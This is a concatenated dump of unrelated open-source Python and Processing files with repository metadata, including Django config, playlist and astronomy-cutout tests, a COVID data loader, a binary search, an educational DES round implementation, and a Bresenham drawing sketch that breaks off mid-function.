instance.shopuserprofile.save() # save form
e815820b5d7c7a3f4883a3e197d90a96fb251308
c9b2336619951fbf560c19d50797ac28dd223a7c
/curiosity/curiosity/wsgi.py
e757b3d8d7227071c822101ae69ce47d7457e907
[]
no_license
rizplate/intuity
13be80168e1cd70a6585d11d4b03b0c5353a9534
daf033e48856f762c4e72912d9c96bdcc1239af1
refs/heads/master
2020-03-27T20:19:37.778175
2018-08-29T07:08:51
2018-08-29T07:08:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
395
py
""" WSGI config for curiosity project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJANGO_SETTINGS_MODULE", "curiosity.settings") application = get_wsgi_application()
1015efbebeea9f7d4049a8bd14345475165128cd
1bb53eaa0a04cdd2c6488fad91abcc856d76b6e4
/test/part2_test.py
99ff02a1e24195103a48f48a8b5a7941fbefd763
[]
no_license
Apurva-Rachala/Bright-Network-Googletask
df05f5be6744b4c445af094d0f4fd3a75f0c74ca
bdfea068ec3d652e48f635d174619cf5a2ab2bfd
refs/heads/main
2023-06-05T15:51:26.301300
2021-07-01T09:22:03
2021-07-01T09:22:03
381,894,539
6
0
null
null
null
null
UTF-8
Python
false
false
9,524
py
from src.video_player import VideoPlayer def test_create_playlist(capfd): player = VideoPlayer() player.create_playlist("my_PLAYlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Successfully created new playlist: my_PLAYlist" in lines[0] def test_create_existing_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.create_playlist("my_COOL_PLAYLIST") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 2 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert ("Cannot create playlist: A playlist with the same name already " "exists") in lines[1] def test_add_to_playlist(capfd): player = VideoPlayer() player.create_playlist("my_COOL_playlist") player.add_to_playlist("my_cool_PLAYLIST", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 2 assert "Successfully created new playlist: my_COOL_playlist" in lines[0] assert "Added video to my_cool_PLAYLIST: Amazing Cats" in lines[1] def test_add_to_playlist_already_added(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 3 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Added video to my_cool_playlist: Amazing Cats" in lines[1] assert "Cannot add video to my_cool_playlist: Video already added" in lines[2] def test_add_to_playlist_nonexistent_video(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.add_to_playlist("my_cool_playlist", "some_other_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 3 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Added video to my_cool_playlist: Amazing Cats" in lines[1] assert "Cannot add video to my_cool_playlist: Video does not exist" in lines[2] def test_add_to_playlist_nonexistent_playlist(capfd): player = VideoPlayer() player.add_to_playlist("another_playlist", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot add video to another_playlist: Playlist does not exist" in lines[0] def test_add_to_playlist_nonexistent_playlist_nonexistent_video(capfd): player = VideoPlayer() player.add_to_playlist("another_playlist", "does_not_exist_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot add video to another_playlist: Playlist does not exist" in lines[0] def test_show_all_playlists_no_playlists_exist(capfd): player = VideoPlayer() player.show_all_playlists() out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "No playlists exist yet" in lines[0] def test_show_all_playlists(capfd): player = VideoPlayer() player.create_playlist("my_cool_playLIST") player.create_playlist("anotheR_playlist") player.show_all_playlists() out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 5 assert "Showing all playlists:" in lines[2] assert "anotheR_playlist" in lines[3] assert "my_cool_playLIST" in lines[4] def test_show_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.show_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.show_playlist("my_COOL_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 6 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Showing playlist: my_cool_playlist" in lines[1] assert "No videos here yet" in lines[2] assert "Added video to my_cool_playlist: Amazing Cats" in lines[3] assert "Showing playlist: my_COOL_playlist" in lines[4] assert "Amazing Cats (amazing_cats_video_id) [#cat #animal]" in lines[5] def test_remove_from_playlist_then_re_add(capfd): player = VideoPlayer() player.create_playlist("MY_playlist") player.add_to_playlist("my_playlist", "amazing_cats_video_id") player.add_to_playlist("my_playlist", "life_at_google_video_id") player.remove_from_playlist("my_playlist", "amazing_cats_video_id") player.add_to_playlist("my_playlist", "amazing_cats_video_id") player.show_playlist("my_playLIST") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 8 assert "Showing playlist: my_playLIST" in lines[5] assert "Life at Google (life_at_google_video_id) [#google #career]" in lines[6] assert "Amazing Cats (amazing_cats_video_id) [#cat #animal]" in lines[7] def test_show_playlist_nonexistent_playlist(capfd): player = VideoPlayer() player.show_playlist("another_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot show playlist another_playlist: Playlist does not exist" in lines[0] def test_remove_from_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.remove_from_playlist("my_COOL_playlist", "amazing_cats_video_id") player.remove_from_playlist("my_cool_playlist", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 4 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Added video to my_cool_playlist: Amazing Cats" in lines[1] assert "Removed video from my_COOL_playlist: Amazing Cats" in lines[2] assert "Cannot remove video from my_cool_playlist: Video is not in playlist" in lines[3] def test_remove_from_playlist_video_is_not_in_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.remove_from_playlist("my_cool_playlist", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 2 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Cannot remove video from my_cool_playlist: Video is not in playlist" in lines[1] def test_remove_from_playlist_nonexistent_video(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.remove_from_playlist("my_cool_playlist", "some_other_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 3 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Added video to my_cool_playlist: Amazing Cats" in lines[1] assert "Cannot remove video from my_cool_playlist: Video does not exist" in lines[2] def test_remove_from_playlist_nonexistent_playlist(capfd): player = VideoPlayer() player.remove_from_playlist("my_cool_playlist", "amazing_cats_video_id") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot remove video from my_cool_playlist: Playlist does not exist" in lines[0] def test_clear_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.add_to_playlist("my_cool_playlist", "amazing_cats_video_id") player.show_playlist("my_cool_playlist") player.clear_playlist("my_COOL_playlist") player.show_playlist("my_cool_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 7 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Added video to my_cool_playlist: Amazing Cats" in lines[1] assert "Showing playlist: my_cool_playlist" in lines[2] assert "Amazing Cats (amazing_cats_video_id) [#cat #animal]" in lines[3] assert "Successfully removed all videos from my_COOL_playlist" in lines[4] assert "Showing playlist: my_cool_playlist" in lines[5] assert "No videos here yet" in lines[6] def test_clear_playlist_nonexistent(capfd): player = VideoPlayer() player.clear_playlist("my_cool_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot clear playlist my_cool_playlist: Playlist does not exist" in lines[0] def test_delete_playlist(capfd): player = VideoPlayer() player.create_playlist("my_cool_playlist") player.delete_playlist("my_cool_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 2 assert "Successfully created new playlist: my_cool_playlist" in lines[0] assert "Deleted playlist: my_cool_playlist" in lines[1] def test_delete_playlist_nonexistent(capfd): player = VideoPlayer() player.delete_playlist("my_cool_playlist") out, err = capfd.readouterr() lines = out.splitlines() assert len(lines) == 1 assert "Cannot delete playlist my_cool_playlist: Playlist does not exist" in lines[0]
e9daf124f0d89650306918eeb692c4acb3851954
99e61f9f6ac04475178d7a8fd6e10c7f05a775c5
/cadccutout/cadccutout/tests/test_core.py
6c2f3f232814e3d858935e5259aca08fbf136e4d
[]
no_license
ijiraq/cadctools
96a6bd30195a5d18da698e6cd80dc0088e1cdd55
6dbea10fc540a6f701c97f6c39bf751fe9c0a205
refs/heads/master
2021-06-20T06:21:01.572774
2020-11-22T03:03:03
2020-11-22T03:03:03
184,329,528
0
0
null
2021-02-25T01:15:07
2019-04-30T20:48:02
Python
UTF-8
Python
false
false
7,102
py
# -*- coding: utf-8 -*- # *********************************************************************** # ****************** CANADIAN ASTRONOMY DATA CENTRE ******************* # ************* CENTRE CANADIEN DE DONNÉES ASTRONOMIQUES ************** # # (c) 2018. (c) 2018. # Government of Canada Gouvernement du Canada # National Research Council Conseil national de recherches # Ottawa, Canada, K1A 0R6 Ottawa, Canada, K1A 0R6 # All rights reserved Tous droits réservés # # NRC disclaims any warranties, Le CNRC dénie toute garantie # expressed, implied, or énoncée, implicite ou légale, # statutory, of any kind with de quelque nature que ce # respect to the software, soit, concernant le logiciel, # including without limitation y compris sans restriction # any warranty of merchantability toute garantie de valeur # or fitness for a particular marchande ou de pertinence # purpose. NRC shall not be pour un usage particulier. # liable in any event for any Le CNRC ne pourra en aucun cas # damages, whether direct or être tenu responsable de tout # indirect, special or general, dommage, direct ou indirect, # consequential or incidental, particulier ou général, # arising from the use of the accessoire ou fortuit, résultant # software. Neither the name de l'utilisation du logiciel. Ni # of the National Research le nom du Conseil National de # Council of Canada nor the Recherches du Canada ni les noms # names of its contributors may de ses participants ne peuvent # be used to endorse or promote être utilisés pour approuver ou # products derived from this promouvoir les produits dérivés # software without specific prior de ce logiciel sans autorisation # written permission. préalable et particulière # par écrit. # # This file is part of the Ce fichier fait partie du projet # OpenCADC project. OpenCADC. # # OpenCADC is free software: OpenCADC est un logiciel libre ; # you can redistribute it and/or vous pouvez le redistribuer ou le # modify it under the terms of modifier suivant les termes de # the GNU Affero General Public la “GNU Affero General Public # License as published by the License” telle que publiée # Free Software Foundation, par la Free Software Foundation # either version 3 of the : soit la version 3 de cette # License, or (at your option) licence, soit (à votre gré) # any later version. toute version ultérieure. # # OpenCADC is distributed in the OpenCADC est distribué # hope that it will be useful, dans l’espoir qu’il vous # but WITHOUT ANY WARRANTY; sera utile, mais SANS AUCUNE # without even the implied GARANTIE : sans même la garantie # warranty of MERCHANTABILITY implicite de COMMERCIALISABILITÉ # or FITNESS FOR A PARTICULAR ni d’ADÉQUATION À UN OBJECTIF # PURPOSE. See the GNU Affero PARTICULIER. Consultez la Licence # General Public License for Générale Publique GNU AfferoF # more details. pour plus de détails. # # You should have received Vous devriez avoir reçu une # a copy of the GNU Affero copie de la Licence Générale # General Public License along Publique GNU Affero avec # with OpenCADC. If not, see OpenCADC ; si ce n’est # <http://www.gnu.org/licenses/>. pas le cas, consultez : # <http://www.gnu.org/licenses/>. # # $Revision: 1 $ # # *********************************************************************** # from __future__ import (absolute_import, division, print_function, unicode_literals) import io import logging import pytest from cadccutout.core import OpenCADCCutout, WriteOnlyStream from cadccutout.pixel_cutout_hdu import PixelCutoutHDU # Compatibility with Python 2.7, where there is no FileNotFoundError. try: FileNotFoundError except NameError: FileNotFoundError = IOError logger = logging.getLogger('cadccutout') logger.setLevel(logging.DEBUG) def test__parse_input(): test_subject = OpenCADCCutout() inputs = ['[9][100:1000]'] results = test_subject._parse_input(inputs) pixel_cutout = results[0] assert pixel_cutout.get_extension() == 9, 'Wrong extension found.' assert pixel_cutout.get_ranges() == [(100, 1000)], 'Wrong ranges found.' inputs = ['[500:700][SCI,8][40:58]'] results = test_subject._parse_input(inputs) pixel_cutout1 = results[0] pixel_cutout2 = results[1] assert pixel_cutout1.get_extension() == 0, 'Wrong extension found for 1.' assert pixel_cutout1.get_ranges() == [(500, 700)], \ 'Wrong ranges found for 1.' assert pixel_cutout2.get_extension() == ('SCI', 8), \ 'Wrong extension found for SCI,8.' assert pixel_cutout2.get_ranges() == [(40, 58)], \ 'Wrong ranges found for 1.' inputs = ['CIRCLE=88.0 115.0 0.5'] results = test_subject._parse_input(inputs) assert results[0] == 'CIRCLE=88.0 115.0 0.5', 'Wrong WCS input.' inputs = ['[AMP]'] results = test_subject._parse_input(inputs) pixel_cutout = results[0] assert pixel_cutout.get_extension() == ('AMP', 1), 'Wrong extension found.' def test__sanity_check_input(): test_subject = OpenCADCCutout() input = '[9][100:1000]' sanity_input = test_subject._sanity_check_input(input) assert isinstance(sanity_input, list), 'Should be list' with pytest.raises(ValueError) as ve: test_subject._sanity_check_input(('bad', 'tuple')) assert ('{}'.format(ve) == 'Input is expected to be a string or list but was \ (u\'bad\', u\'tuple\')') or ('{}'.format(ve) == 'Input is expected to be a string or list but was \ (\'bad\', \'tuple\')'), \ 'Wrong error message.' def test_write_stream(): output = io.BytesIO() test_subject = WriteOnlyStream(output) with pytest.raises(ValueError): test_subject.read() assert test_subject.tell() == 0, 'Nothing written yet, should be zero.' test_subject.write(b'You have been recruied by the Star League to defend \ the frontier against Xur and the Kodhan Armada.') assert test_subject.tell() == 111, 'Message written.' def test_construct(): test_subject = OpenCADCCutout() with pytest.raises(ValueError) as ve: test_subject.cutout([]) assert str(ve.value) == 'No Cutout regions specified.', \ 'Wrong error message.' with pytest.raises(FileNotFoundError): test_subject.cutout([PixelCutoutHDU([(8, 10)])], input_reader=open('/no/such/file'))
223c74d91cb5f952d691d5651a076036d79b9123
b0b43e25501240086cad821b34fd0917581d8ca0
/covid/jhu.py
ab6bf79a4b198cebef7c4a17f44510affc885981
[ "MIT" ]
permissive
mysterefrank/covid-test
648212e608d2dce83ae50f2c6f5127107450c23b
8651d9515376ca88e25b309c710c256bb22804d9
refs/heads/master
2022-12-18T19:16:45.940111
2020-09-25T15:20:55
2020-09-25T15:20:55
298,607,436
1
0
null
null
null
null
UTF-8
Python
false
false
5,530
py
import pandas as pd import cachetools.func import warnings from . import states @cachetools.func.ttl_cache(ttl=600) def load_and_massage(url): df = pd.read_csv(url) df = df.drop(columns=['Lat', 'Long']) df = df.rename(columns={'Province/State' : 'province', 'Country/Region' : 'country'}) df.province = df.province.replace(states.abbrev) df.province = df.province.fillna('tot') df = df.set_index(['country', 'province']) df = df.T df.index = pd.to_datetime(df.index) return df @cachetools.func.ttl_cache(ttl=600) def load_world(): sources = { 'confirmed' : 'https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv', 'death' : 'https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv' } # Load each data file into a dataframe with row index = date, and column index = (country, province) d = {key: load_and_massage(url) for key, url in sources.items()} # Concatenate data frames: column index is now (variable, country, province) df = pd.concat(d.values(), axis=1, keys=d.keys()) # Permute order of index to (country, province, variable) and sort the columns by the index value df = df.reorder_levels([1,2,0], axis=1).sort_index(axis=1) return df @cachetools.func.ttl_cache(ttl=600) def get_fips_codes(): '''Get valid FIPS codes from covid19forecasthub''' url = 'https://raw.githubusercontent.com/reichlab/covid19-forecast-hub/master/data-locations/locations.csv' df = pd.read_csv(url) fips_codes = df['location'] fips_codes = fips_codes.loc[fips_codes != 'US'].astype(int) return fips_codes def filter_counties(df): '''Filter rows from JHU data schema to counties represented in forecast hub''' fips_codes = get_fips_codes() # exclude_counties = ['Kings, New York, US', # 'Queens, New York, US', # 'Bronx, New York, US', # 'Richmond, New York, US'] exclude_counties = [] # Subset to locations: # (1) in US, # (2) with county name, # (3) with FIPS code recognized by forecast hub # (4) not in list of NYC counties with no data on JHU df = df.loc[(df['iso2']=='US') & (df['Admin2']) & (df['FIPS'])].copy() df['FIPS'] = df['FIPS'].astype(int) df = df.loc[df['FIPS'].isin(fips_codes)].copy() df = df.loc[~df['Combined_Key'].isin(exclude_counties)].copy() return df @cachetools.func.ttl_cache(ttl=600) def get_county_info(): '''Get state info from JHU location lookup file''' url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv' df = pd.read_csv(url) df = filter_counties(df) # Add county and state columns, and set key to <state abbrev>-<county name> df['name'] = df['Admin2'] df['state'] = df['Province_State'].replace(states.abbrev) df['key'] = df['state'] + '-' + df['name'] df = df.set_index('key') return df @cachetools.func.ttl_cache(ttl=600) def get_state_info(): '''Get state info from JHU location lookup file''' url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv' df = pd.read_csv(url) df = df.loc[df['FIPS'] <= 78].copy() df['name'] = df['Province_State'] df['key'] = df['Province_State'].replace(states.abbrev) df = df.set_index('key') return df @cachetools.func.ttl_cache(ttl=600) def load_us(counties=False): baseURL = "https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/" def load_us_time_series(file): '''Load data in JHU US time series format (death or confirmed)''' df = pd.read_csv(baseURL + file) meta_cols = ['UID', 'Lat', 'Long_', 'iso2', 'iso3', 'code3', 'FIPS', 'Admin2', 'Province_State', 'Country_Region', 'Combined_Key', 'Population'] meta_cols = [c for c in meta_cols if c in df.columns] if counties: # subset to valid counties, set index to <state abbrev>-<county> and drop other metadata columns df = filter_counties(df) state = df['Province_State'].replace(states.abbrev) county = df['Admin2'] #county = county.replace({'New York': 'New York City'}) # correct inconsistency with metadata table df = df.drop(columns=meta_cols) df = df.set_index(state + '-' + county) else: # group by state df['state'] = df['Province_State'].replace(states.abbrev) df = df.drop(columns=meta_cols).groupby('state').sum() df = df.T df.index = pd.to_datetime(df.index) return df confirmed = load_us_time_series("time_series_covid19_confirmed_US.csv") deaths = load_us_time_series("time_series_covid19_deaths_US.csv") # Combine deaths and confirmed df = pd.concat([deaths,confirmed],axis=1,keys=('death','confirmed')) df = df.reorder_levels([1,0], axis=1).sort_index(axis=1) return(df)
e40c7ed10e2b7d22d766e593e829ebe54b749b93
07e429888e0e564b2d6a8b55180fd117038bc268
/Probability-Basics-/code.py
0360c0140c70d0bdf03640be5260ccfed050a9d2
[ "MIT" ]
permissive
Varun0801/ga-learner-dsb-repo
21803c331c886f060edc803be9e33e88d236bd86
45ce5ae273ca66a2443d4b9417e74ef0f872d8ec
refs/heads/master
2023-02-04T09:58:18.310189
2020-12-25T12:02:55
2020-12-25T12:02:55
255,108,538
1
0
null
null
null
null
UTF-8
Python
false
false
1,242
py
# -------------- import numpy as np import pandas as pd import matplotlib.pyplot as plt # code starts here df = pd.read_csv(path) #print(df.info()) p_a = ((df['fico'] > 700).sum())/len(df) print(p_a) p_b = ((df['purpose'] == 'debt_consolidation').sum())/len(df) print(p_b) df1 = df[df['purpose']== 'debt_consolidation'] p_a_b = df1[df1['fico'].astype(float) >700].shape[0]/df1.shape[0] print(p_a_b) result = p_a_b == p_a print(result) # code ends here # -------------- # code starts here prob_lp = (df['paid.back.loan'] == 'Yes').sum()/len(df) print(prob_lp) prob_cs = (df['credit.policy'] == 'Yes').sum()/len(df) print(prob_cs) new_df = df[df['paid.back.loan'] == 'Yes'] prob_pd_cs = (new_df['credit.policy'] == 'Yes').sum()/len(new_df) print(prob_pd_cs) bayes = (prob_pd_cs*prob_lp)/prob_cs print(bayes) # code ends here # -------------- # code starts here plt.bar(df['purpose'],df['purpose'].index) df1 = df[df['paid.back.loan'] == 'No'] df1 plt.bar(df1['purpose'],df1['purpose'].index) # code ends here # -------------- # code starts here inst_median = df['installment'].median() print(inst_median) inst_mean = df['installment'].mean() print(inst_mean) plt.hist(df['installment']) plt.hist(df['log.annual.inc']) # code ends here
607cbcb23dfd9977fb1af1f2f5a04824532bcfd8
0f33bea55f5d1c4276d851c3697f7257fb9c5d60
/Python/binary-sort.py
770554c775ceea7b2c05ac5bafea0c719e2bfab4
[]
no_license
Ankita909/fullstackDevelopment
193a3efe72faf36f8e0ecd71efa4c858e0b432c2
e5c1c216e6fa4381fc28f76ce661ec418fa72083
refs/heads/main
2023-08-27T12:11:30.392642
2021-10-01T13:38:50
2021-10-01T13:38:50
412,479,587
1
0
null
2021-10-01T13:35:34
2021-10-01T13:35:34
null
UTF-8
Python
false
false
810
py
# Python recursive binary search. # Returns index of x in arr if present, else -1 def binarySearch (arr, l, r, x): # Check base case if r >= l: mid = l + (r - l) // 2 # If element is present at the middle itself if arr[mid] == x: return mid # If element is smaller than mid, then it # can only be present in left subarray elif arr[mid] > x: return binarySearch(arr, l, mid-1, x) # Else the element can only be present # in right subarray else: return binarySearch(arr, mid + 1, r, x) else: # Element is not present in the array return -1 # Driver Code arr = [ 2, 3, 4, 10, 40 ] x = 10 # Function call result = binarySearch(arr, 0, len(arr)-1, x) if result != -1: print ("Element is present at index % d" % result) else: print ("Element is not present in array")
32d8cc7336a534b7aa3d304be09170c44366afc1
0d492125e092f1fafb00e1ba24c0c50c5bd5e379
/modle/dataGenerator.py
adde198810577582ba1f38def9db429f62af3529
[]
no_license
ammarhamdy/DES
13902bd7cb0647f0e0d05d3d1d95121c777895e8
447a0e9132de5c146a0215fc697ca71a86dcd55a
refs/heads/master
2020-04-09T14:21:25.583452
2018-12-25T08:18:48
2018-12-25T08:18:48
160,394,985
1
0
null
null
null
null
UTF-8
Python
false
false
3,976
py
import csv import os def xor(a: str, b: str): a_xor_b = str() for i in range(len(a)): a_xor_b += str(int(a[i]) ^ int(b[i])) return a_xor_b class DataGenerator: def __init__(self, e_path: str, s_box_dir_path: str, p_path: str): # load bit selection matrix(8X6). self.e = list(csv.reader(open(e_path))) # load s_box directory each s-box(4X16). names: list = os.listdir(s_box_dir_path) self.s_boxes: list = \ [list(csv.reader(open(s_box_dir_path + '\\' + names[0]))), list(csv.reader(open(s_box_dir_path + '\\' + names[1]))), list(csv.reader(open(s_box_dir_path + '\\' + names[2]))), list(csv.reader(open(s_box_dir_path + '\\' + names[3]))), list(csv.reader(open(s_box_dir_path + '\\' + names[4]))), list(csv.reader(open(s_box_dir_path + '\\' + names[5]))), list(csv.reader(open(s_box_dir_path + '\\' + names[6]))), list(csv.reader(open(s_box_dir_path + '\\' + names[7])))] # load permutation matrix(8X4). self.p = list(csv.reader(open(p_path))) def expand(self, right: str): """apply matrix e; from 32bits return 48bits""" expanded = str() for sub_list in self.e: for item in sub_list: expanded += right[int(item) - 1] return expanded def reduction(self, bits: str): """split 48bits(8*6) in to 32bit(8*4), apply SBox to each block""" reduction_bits = str() for i in range(8): block = bits[i * 6: (i + 1) * 6] reduction_bits += str(bin(int(self.s_boxes[i][int(block[0] + block[5], 2)][int(block[1:5], 2)]))[2:]) \ .rjust(4, '0') return reduction_bits def mangler_function(self, right: str, key: str): """apply matrix P return 32bits""" r_xor_k = self.reduction(xor(self.expand(right), key)) p_r_xor_k = str() for sub_list in self.p: for item in sub_list: p_r_xor_k += r_xor_k[int(item) - 1] return p_r_xor_k def round16(self, left0: str, right0: str, key_generator): """return data left16, right16.""" l0, r0 = left0, right0 for i in range(16): left = r0 right = xor(l0, self.mangler_function(r0, key_generator.next_sub_key())) r0, l0 = right, left return l0, r0 if __name__ == '__main__': # test... # dataGenerator = DataGenerator('..\\data\\bit selection.csv', '..\\data\\sbox', '..\\data\\P.csv') # e = dataGenerator.expand('11110000101010101111000010101010') # print(e == '011110100001010101010101011110100001010101010101') # k = '000110110000001011101111111111000111000001110010' # r = '011110100001010101010101011110100001010101010101' # r_xor_k = xor(r, k) # print(r_xor_k == '011000010001011110111010100001100110010100100111') # reduction = dataGenerator.reduction_of('011000010001011110111010100001100110010100100111') # print(reduction == '01011100100000101011010110010111') # k1 = '000110110000001011101111111111000111000001110010' # r0 = '11110000101010101111000010101010' # mf = dataGenerator.mangler_function(r0, k1) # print(mf, '\n', mf == '00100011010010101010100110111011') # from keyGenerator import KeyGenerator # keys = KeyGenerator('..\\data\\pc-1.csv', '..\\data\\pc-2.csv', '..\\data\\number of left shifts.csv').\ # sub_keys_of('0001001100110100010101110111100110011011101111001101111111110001') # M = '0123456789ABCDEF' # r0 = '11110000101010101111000010101010' # l0 = '11001100000000001100110011111111' # l16r16 = dataGenerator.round16_of(l0, r0, keys) # print(l16r16[0] == '01000011010000100011001000110100', # '\n', l16r16[1] == '00001010010011001101100110010101') pass
63fd2099a3ee63f20feb648b8aece53e9b92a953
6a0bdd7339aa8184b5b3938dd8746ef09f65ee7a
/hw1/matmult.py
d9bfdd98fa59026cba68233a8690b9e66132250e
[]
no_license
hiqbal97/CS314
e375b16f644a6d5322a02447149fad5f41c1ceb4
e34b77bbde92675157e5e3c9a5273889392dea79
refs/heads/master
2020-04-27T08:46:43.154693
2019-05-13T20:14:29
2019-05-13T20:14:29
174,185,325
0
0
null
null
null
null
UTF-8
Python
false
false
991
py
#!/usr/bin/env python3 def main(): dim1 = input() size1 = [int(x) for x in dim1.split() if x.isdigit()] mat1 = [] for i in range(size1[0]): rows = input() row = [] for num in rows.split(): row.append(float(num)) mat1.append(row) dim2 = input() size2 = [int(x) for x in dim2.split() if x.isdigit()] mat2 = [] for i in range(size2[0]): rows = input() row = [] for num in rows.split(): row.append(float(num)) mat2.append(row) if size1[1] != size2[0]: print('invalid input') else: result_mat = [] for i in range(size1[0]): rows = [] for j in range(size2[1]): rows.append(0) result_mat.append(rows) for i in range(len(mat1)): for j in range(len(mat2[0])): for k in range(len(mat2)): result_mat[i][j] += mat1[i][k] * mat2[k][j] for i in range(size1[0]): for j in range(size2[1]): if j == (size2[1] - 1): print(result_mat[i][j]) else: print(result_mat[i][j], '', end = '') if __name__ == '__main__': main()
8ab1edb2538a42d648a941c4c748eb675a5a3761
78c4a0b029ef1af4ac9ef90305eef85ef866ad35
/gfx/processing/bresenham/bresenham.pyde
8a899712315e147dc3d2a28dc23bf64a333e9908
[ "MIT" ]
permissive
qeedquan/misc_utilities
7727e33e01a9f45275e3efdd165c90053d8ba10a
e8319e6572dd92efceebb5a2d52a00cb993492b2
refs/heads/master
2023-08-08T13:24:18.213741
2023-08-07T00:26:03
2023-08-07T00:26:03
46,625,839
10
3
null
null
null
null
UTF-8
Python
false
false
8,792
pyde
# http://members.chello.at/~easyfilter/bresenham.html from math import * class Grid: def __init__(self): self.size = 32 self.x0, self.y0 = -1, -1 self.x1, self.y1 = -1, -1 def pix2cell(self, x, y): return x/self.size, y/self.size def point(self, x, y, err = None): fill(34+x*2, 40+y*2, 50) rect(x*self.size, y*self.size, self.size, self.size) if err == None: return y += 1 fill(255) str = "%d" % (err) textSize(16) text(str, x*self.size, y*self.size) # derivation: # y = (y1-y0)/(x1-x0)(x-x0) - y0 # y(x1-x0) = (y1-y0)(x-x0) - y0(x1-x0) # (y-y0)(x1-x0) - (y1-y0)(x-x0) = 0 # now we have an implicit equation that gives us 0 # whenever (x, y) is on the line, we can use this to calculate # the error term # e = (y-y0)(x1-x0) - (y1-y0)(x-x0) # if we define dx = (x1-x0) and dy = (y1-y0) # we can write it as # e = (y-y0)dx - (x-x0)dy # when we move to the next point, there are 2 choices we can make # either go in the x direction or y direction, x will always increase # since we are moving in a line, so the decision whether or not to increment # y or not depends on the error # let e_x be the error if we just increase x and e_xy if we move in both x and y direction # e_x = (y-y0)dx - (x+1-x0)dy # e_xy = (y+1-y0)dx - (x+1-x0)dy # we can rewrite this in term of the previous error # e_x = (y-y0)dx - (x-x0)dy + dx -> # e_x = (y+1-y0)dx - (x-x0)dy -> # e_x = e + dx # e_xy = (y-y0)dx - (x-x0)dy + dx - dy -> # e_xy = (y+1-y0)dx - (x+1-x0)dy -> # e_xy = e + dx - dy # dy is treated as negative in the code because y coordinate is flipped in window space # the initial e0 is defined to be e_xy # so we keep updating the error term when we decide to move in x or in xy direction def line(self, x0, y0, x1, y1): dx = abs(x1-x0) dy = -abs(y1-y0) sx = 1 if x0 < x1 else -1 sy = 1 if y0 < y1 else -1 err = dx+dy while True: self.point(x0, y0, err) if x0 == x1 and y0 == y1: break e2 = 2*err if e2 >= dy: err += dy x0 += sx if e2 <= dx: err += dx y0 += sy def thickline(self, x0, y0, x1, y1, wd): dx = abs(x1-x0) dy = abs(y1-y0) sx = 1 if x0 < x1 else -1 sy = 1 if y0 < y1 else -1 err = dx-dy ed = 1 if dx+dy == 0 else sqrt(dx*dx*1.0+dy*dy*1.0) wd = (wd+1)/2 while True: self.point(x0, y0, err) e2 = err x2 = x0 if 2*e2 >= -dx: e2 += dy y2 = y0 while e2 < ed*wd and (y1 != y2 or dx > dy): y2 += sy # if want AA, then make color max(0,255*(abs(e2)/ed-wd+1) # so it changes colors around the surroundings self.point(x0, y2, err) e2 += dx if x0 == x1: break e2 = err err -= dy x0 += sx if 2*e2 <= dy: e2 = dx-e2 while e2 < ed*wd and (x1 != x2 or dx < dy): x2 += sx self.point(x2, y0, err) e2 += dy if y0 == y1: break err += dx y0 += sy def ellipse(self, x0, y0, x1, y1): # value of diameter a = abs(x1-x0) b = abs(y1-y0) b1 = b&1 # error increment dx = 